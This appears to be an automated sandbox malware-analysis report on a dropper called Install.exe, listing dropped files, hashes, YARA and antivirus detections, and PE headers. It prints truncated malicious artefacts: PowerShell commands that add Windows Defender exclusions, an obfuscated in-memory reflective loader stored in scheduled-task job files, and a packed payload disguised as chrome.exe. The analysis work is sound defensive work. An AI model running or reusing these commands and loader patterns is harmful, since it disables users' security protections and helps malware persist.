                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\34432.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 35%, Browse
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=

                          C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe

                          Download File
                          Process:C:\Users\user\Desktop\Install.exe
                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):5028144
                          Entropy (8bit):6.125106867276156
                          Encrypted:false
                          SSDEEP:98304:aqbWYKVEOkkj9NM8zWTl2ALz6dggqBu0teFFJyMEllE+VeJqUH:idzW0QuRabllA7
                          MD5:D55DC38B4EE6BED2168E74194533C572
                          SHA1:431F6F9AEB280102E8764A5184CABE6CC98052CA
                          SHA-256:4B283EC8E073FB61BBB612A152EB332A5C92E7473CF6584A8B716FD87684A936
                          SHA-512:C731304F2EC41AC9A49CA1727ED948299A40702D78A2B0BC9506E50AEAB97B5ADCF09D8958E48F8A0FFC9E2FF78941ED68DCAED2BAB06FEA847EB29EFAE58150
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: Virustotal, Detection: 50%, Browse
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....<b..................B..@......;.........B...@..........................pL..............................................C.<....................pL.0I............................................C.@.............B.\............................text....?.......@.................. ..`.nQuHRq..o@..P...p@..D.............. ..`.rdata........B.......B.............@..@.data.........C.......C.............@....9SAT.........C.......C............. ..`........................................................................................................................................................................................................................................................................................................................................................................................................................................

                          C:\Users\user\AppData\Roaming\Chrome\chrome.exe

                          Download File
                          Process:C:\Users\user\AppData\Roaming\34432.exe
                          File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):2366976
                          Entropy (8bit):7.993982412207083
                          Encrypted:true
                          SSDEEP:49152:x/HcwvGPAc5un0WVlI4UY5WmWBNkheV9qeAhpC9c4E3aT:RcwePj5un1l1M/C2PsaT
                          MD5:04F6704BD3AB97905A497BAF3D7FDB3C
                          SHA1:7D216C427AF6199D119B1C5A0CC93BDB724AF669
                          SHA-256:39630AAF0E17AA1929B5CF2F4340C22F22FA6F8F6D76F8398C288BFF972B95FA
                          SHA-512:1176BF1BA8F5E640C0D425B76CCDD4A97D1BA250773568588DAB78518AF4F1B1A53F7405016E75FAB7812DD9D67754558BA73025E176B49472491A653E6ED4C1
                          Malicious:true
                          Yara Hits:
                          • Rule: SUSP_NET_NAME_ConfuserEx, Description: Detects ConfuserEx packed file, Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exe, Author: Arnim Rupp
                          Antivirus:
                          • Antivirus: Avira, Detection: 100%
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 77%
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....<b..........".......$.............. .....@..... .......................`$...........@...@......@............... ...............................@$.............................................................................................. ..H............text.....$.. ....$................. ..`.rsrc........@$.......$.............@..@........................................H.........#.@.......R.......................................................#..tJ...w.S._...v.o2...+3L....AnRR.....J.Xf..(.....=.o..f....cu.....sq.X@F..............8....._u...o.zv]Fl.....X`.VWm.H. ...K.C#....o..e,..,r..I(..>.V3..K....R..@......(.2-^..Hd.....\..b......SY .-..yU,.[...CB.D.[.L..=...H..g...k.......I.h.4..|c....t.....).]..`.....^......8^G 3JZ.n../..g.9.....m{....A-f;./.e....]Q_...K.R^.>a!.<Om.b..O.c.5...M.5......@...bm[.6..a..|S....1..L.r....Z.CX=

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.JE93yUZc.20220327014216.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.5305777622288925
                          Encrypted:false
                          SSDEEP:96:BZioj4N2c+qDo1Zo8FZikj4N2c+qDo1Zoe3x1xvxjZiij4N2c+qDo1ZooSx/x/xa:eSc57ec5Tgc5c6G
                          MD5:65537AD9317CD9A794FF2C8A25E3A7F8
                          SHA1:99CFC1994EEDC8F868B1245E655587DB41F269DF
                          SHA-256:5F7D9A86D2E3083645825298C5A61B2EB54DA2F2DA13241ECA4602C03766123F
                          SHA-512:99194B41134E7D8C016A22F4556267CE9C512AF7E886F10A2E2F3E4CF6478CF5DEB239A07E8CEE2EA383FCDD222C62680EA9163BBE25C576296390688BC78441
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014217..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.mru0uP4T.20220327014103.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.526751101211023
                          Encrypted:false
                          SSDEEP:96:BZisj4N2ctqDo1ZoQFZiFj4N2ctqDo1Zol3x1xvxjZirj4N2ctqDo1ZoHSx/x/xO:eGckvBckGzckpRD
                          MD5:3B10DF410A30476A570541A74E966B4E
                          SHA1:8834897CC7C20AD5C4C4B59A91B5535FB94B454A
                          SHA-256:4D3D10EC15EB5EB0E10AF8753F72EACE24DC29BA1D9B1638A7B1DD29C2EF8BC9
                          SHA-512:6D119BC9B7440EEFD9E2112530BAE3D038B6C698CFD12AAAB9FFA10EEDA1575BCE5BA56C395A930851F0498559C1CB576E871F14CBA37C79B716AB6C30A84A8A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 7048..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014103..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta

                          C:\Users\user\Documents\20220327\PowerShell_transcript.562258.nmfYJOoe.20220327014128.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5758
                          Entropy (8bit):5.5307589123834395
                          Encrypted:false
                          SSDEEP:96:BZiAj4N2AMvtqDo1ZojZiqj4N2AMvtqDo1ZoCgC4jZiqj4N2AMvtqDo1ZotBooSV:eqFk0IFkcIFk22y
                          MD5:7E8115E31EC613777C6FDFF8F88B6CF2
                          SHA1:253DBF54E6B578E26E71DC64D505DE9F62630062
                          SHA-256:4045DB0535FC2EF934E014E0C773D7E43CA50B077ED8536979F8CED459F1B608
                          SHA-512:5C6316219855F84FF2A3854F02035C1D55690AFA1286A93171565D10DBBDB1AC4F44E4A23CF4D7C455835CECBB7F8B749B98B31340C32B4CB26FFB23F87C82E7
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014129..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014129..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220327014354..Username: computer\user..Run

                          C:\Windows\System32\20220327\PowerShell_transcript.562258.muxVAL9A.20220327014144.txt

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5943
                          Entropy (8bit):5.8320176220731055
                          Encrypted:false
                          SSDEEP:96:BZiuN4NNv4GZig3yXM84p32aw0lFrc0lmrn0lmTeowqDo1Zoav4GZig3yXM84p3j:envVnIKjVQr0QBavVnIKjVQr0QPu3
                          MD5:4D218FEB27E8E5EDB4F59D0922AA32A2
                          SHA1:DF06E9EDE255262EF358472D0C2A9B2FA306664D
                          SHA-256:5E36C2D39F94189CCAD4AEE28C26042A699ACEE5BB8E3C23ACA4C9BF9F16D853
                          SHA-512:FC7599509D4679CEA32839E147EA6A718DF3B58450ACC69B6B43135DFDAF0034EC5810C87918A8FB74C51F6613D8A44AE944B9AB12611BA992A5B27561D99C7A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014145..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$j

                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9432
                          Entropy (8bit):4.926811811017033
                          Encrypted:false
                          SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdJgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4L+kjh4iUxm44Qib4w
                          MD5:ADFF5BE0A9BB797ADEDC0B16C501A155
                          SHA1:ED842BE69739E3BF9082DE8FB0F7A596C22C0345
                          SHA-256:DADBB3611E60443C1F96672B3950A32B915D115EAA6FE8F6D8A57BED4067E3B0
                          SHA-512:9C6CA436FCE28572CD48D090C437881657F17B415A26F6C113A89755282D5D9BF46650B5C3C31FD890EC5C67CA0AB9A90A6F28B21B8315C25B506C6AC8EE600E
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                          C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1112
                          Entropy (8bit):5.248273118987016
                          Encrypted:false
                          SSDEEP:24:3lPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKyH+S:VPerB4nqRL/HvFe9t4Cv94nH+S
                          MD5:C89140BEA721DEBDA4F741B52939612A
                          SHA1:A353FE9D71C211A24EE7208F45CCC71170A65CD4
                          SHA-256:05E8082DAD4310F294CF069474C1DFA784427D69E87229D750FDA87C46B2D0B4
                          SHA-512:B134E10810FD68B0F50B143A08AFD88AA340CC54C561B09D559E23A77149AC31F26DFFC2FAAC5485247896CDB8535C0084EA2EDD815FB6E56F385F956D00DF27
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

                          C:\Windows\Tasks\nslooksvc32.job

                          Download File
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5350
                          Entropy (8bit):3.907212050468804
                          Encrypted:false
                          SSDEEP:96:mgTVA1VwC9Hw1+Y3fmb2lpL+llpK3vbM+C4aWbga+vlLF5uOgA/wvpHJN/gAwIgA:3TVoVwC9HW/3+bq6hQM+CWbgaSLTu5A+
                          MD5:D6D553675A7B8F75130BDD8C7E3B7A7D
                          SHA1:EC8FE28936E9C0010B55180AD5A34439D1919EE3
                          SHA-256:523EAA769500D372D8DA8A2D77004F7F696865A174BB809B359792067822BE39
                          SHA-512:4DB377FD79B7B2218D824B04DF301209890D543C97A254A96AB28202890A23A7D68055EDF02592837377579ECD21F1055EC224F93B3C5CDF2D1295FD1B99A09F
                          Malicious:false
                          Reputation:unknown
                          Preview:......m....O.m....[F.......<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.o.B.Y.Z.x.p.o.B.u.J.D.g.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.h.C.P.A.J.C.D.c.A.n.F.q.J.q.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.N.i.b.V.x.W.x.T.F.c.).$.q.K.H.X.R.L.j.x.c.Q.b.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.

                          C:\Windows\Tasks\nslooksvc64.job

                          Download File
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5250
                          Entropy (8bit):3.8780212618682253
                          Encrypted:false
                          SSDEEP:96:hgTVwJV49Hw1+Y3Xb+pXpK9M+C4aWOtBmD9Z+vl9EF5oY5gAeNvpHYNiagABQnor:2TVwJV49HW/3XbGZ+M+CW6gDzSeToYu6
                          MD5:8743521E80CA300CB5D64D9129AC9B32
                          SHA1:02EC0C200E3CE2F12CA6EFAC516CFC0E72DA5AA2
                          SHA-256:B71335A7AF988047E29D0BDCE479EE8DD32351F03DE0A73D53D7D5C68E82A1F9
                          SHA-512:308CE10E6858A1BF1CDB67356CA719E5E9EB735B2D6DA85AB32F903F35C125BA7166FC5951C13EC05EA859BBD0234901CE3A99683AB2A7A3ECA6AA51FE128755
                          Malicious:false
                          Reputation:unknown
                          Preview:....2a.!..OB.if.t...F.P.....<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.J.c.V.E.S.t.Q.t.P.h.k.P.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.j.w.j.R.g.Z.F.z.a.e.Z.B.Q.B.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.j.X.r.d.W.y.l.J.n.o.).$.J.k.E.T.j.F.s.A.c.r.F.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.

                          C:\Windows\Temp\__PSScriptPolicyTest_0aljq3hk.ty5.ps1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_jbeqyhc4.p5f.psm1

                          Download File
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_oz5sx3tu.kvs.ps1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          C:\Windows\Temp\__PSScriptPolicyTest_sxsipg5c.ym2.psm1

                          Download File
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1

                          Static File Info

                          General

                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.9968573054623615
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Install.exe
                          File size:4713759
                          MD5:280bfd5ea1f41586ea0ef60ee44bc8db
                          SHA1:57aa866f42bccbaceed938390001148323d033c1
                          SHA256:a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
                          SHA512:5c2bd96fd1bf0d3c3cfbca97666c9b20a6ae2ee651ad50739d30a24339b90c9f5261c9c5ea93004c4d048d892708a22802f615f5ac8a7464dc07a614366e0bd8
                          SSDEEP:98304:keFfhFS2DkSocOZKjg/sN0GkhVT8pxlxE7SSvsaTGN:keFfhxISoJZKs/DjV0xESmeN
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........

                          File Icon

                          Icon Hash:62f1d8ece6f37980

                          Static PE Info

                          General

                          Entrypoint:0x40352d
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6

                          Entrypoint Preview

                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A2E0h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080CCh]
                          mov esi, dword ptr [004080D0h]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FAAFC52011Ah
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FAAFC5200EAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [00434FB8h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx

                          Rich Headers

                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804

                          Data Directories

                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x42a8.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
